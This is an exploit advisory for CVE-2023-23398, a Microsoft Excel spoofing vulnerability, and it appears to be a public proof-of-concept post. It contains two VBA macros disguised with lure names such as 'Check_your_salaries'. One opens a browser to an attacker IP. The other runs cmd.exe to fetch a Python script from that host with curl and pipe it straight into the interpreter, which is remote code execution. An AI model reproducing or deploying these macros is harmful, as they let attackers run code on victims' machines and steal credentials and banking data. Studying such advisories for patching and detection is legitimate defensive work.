Microsoft Excel Spoofing

## Title: Microsoft Excel Spoofing Vulnerability## Author: nu11secur1ty## Date: 04.06.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/excel## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/## CVE-2023-23398## Description:The attack itself is carried out locally by a user with authenticationto the targeted system. An attacker could exploit the vulnerability byconvincing a victim, through social engineering, to download and opena specially crafted file from a website which could lead to a localattack on the victim's computer. The attacker can trick the victim toopen a malicious web page by using an Excel malicious file and he cansteal credentials, bank accounts information, sniffing and trackingall the traffic of the victim without stopping - it depends on thescenario and etc.STATUS: HIGH Vulnerability[+]Exploit:```vbsSub Check_your_salaries()CreateObject("Shell.Application").ShellExecute"microsoft-edge:http://192.168.100.96/"End Sub```[+]The victim Exploit + Curl Piping:## WARNING:The exploit server must be STREAMING at the moment when the victim hitthe button of the exploit!```vbsSub silno_chukane()  Call Shell("cmd.exe /S /c" & "curl -shttp://192.168.100.96/PoC/PoC.py | python", vbNormalFocus)End Sub```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23398)## Reference:[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23398)[href](https://www.rapid7.com/fundamentals/spoofing-attacks/)## Proof and Exploit[href](https://streamable.com/n5qp4q)## Proof and Exploit[href](https://streamable.com/u2wxzz)## Time spend:01:37:00